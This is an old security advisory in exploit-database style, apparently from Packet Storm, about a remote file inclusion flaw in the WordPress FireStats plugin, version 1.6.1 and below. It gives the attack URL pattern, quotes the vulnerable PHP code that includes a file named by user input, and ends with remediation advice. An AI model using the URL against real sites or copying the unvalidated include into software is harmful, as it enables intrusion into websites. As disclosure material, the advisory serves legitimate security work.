The WordPress FireStats plugin versions 1.6.1 and below suffer from a remote file inclusion vulnerability.
5023bfef7b22c65f3d557e4e4e0c48b5770cdec9ab8363ec202cd1b05778bfcc[»]===============================================================================================================[_][-][X]
[»] [»]
[»] WordPress Plugin FireStats <= 1.6.1-stable (fs_javascript) RFI Vulnerability [»]
[»] [»]
[»] ======= ------d-------m------ ==== ==== [»]
[»] || = | |(o o)| | || || || [»]
[»] || = ||(~)|| || || [»]
[»] ======= /|\ || || [»]
[»]=====================================================================================================================[»]
[»] Author : darkmasking [»]
[»] Date : June, 13th 2009 [»]
[»] Contact : darkmasking[at]gmail.com [»]
[»] Critical Level : Dangerous *red* [»]
[»]---------------------------------------------------------------------------------------------------------------------[»]
[»] Affected software description : [»]
[»] Software : FireStats Version 1.6.1-stable [FireStats is a web statistics system] [»]
[»] Vendor : http://firestats.cc/ [»]
[»] Price : $25.00 ( commercial usage ) [»]
[»]=====================================================================================================================[»]
[»] [»]
[»] [~] RFI : [»]
[»] [»]
[»] http://www.TARGET.com/[path]/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=[darkc0de] [»]
[»] [»]
[»]---------------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] Vuln : firestats-wordpress.php :Line 36 [»]
[»] [»]
[»] $path = fs_get_firestats_path(); [»]
[»] $file = $_GET['fs_javascript']; [»]
[»] unset($_GET['fs_javascript']); [»]
[»] if (strpos($file,"..") !== false) die(".. is not allowed in fs_javascript"); [»]
[»] require_once("$path/$file"); [»]
[»] [»]
[»]---------------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] Vulnerability description : [»]
[»] [»]
[»] This script is possibly vulnerable to file inclusion attacks. [»]
[»] [»]
[»] It seems that this script includes a file which name is determined using user-supplied data. [»]
[»] This data is not properly validated before being passed to the include function. [»]
[»] [»]
[»]---------------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] How to fix this vulnerability : [»]
[»] [»]
[»] Edit the source code to ensure that input is properly validated. Where is possible, [»]
[»] it is recommended to make a list of accepted filenames and restrict the input to that list. [»]
[»] [»]
[»] For PHP, the option allow_url_fopen would normally allow a programmer to open, [»]
[»] include or otherwise use a remote file using a URL rather than a local file path. [»]
[»] It is recommended to disable this option from php.ini. [»]
[»] [»]
[»]---------------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] Greetz : [»]
[»] [»]
[»] Sorry bro lom ada teman jadi tuk diri sendiri aja! [»]
[»] [»]
[»] [»]
[»]=====================================================================================================================[»]
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed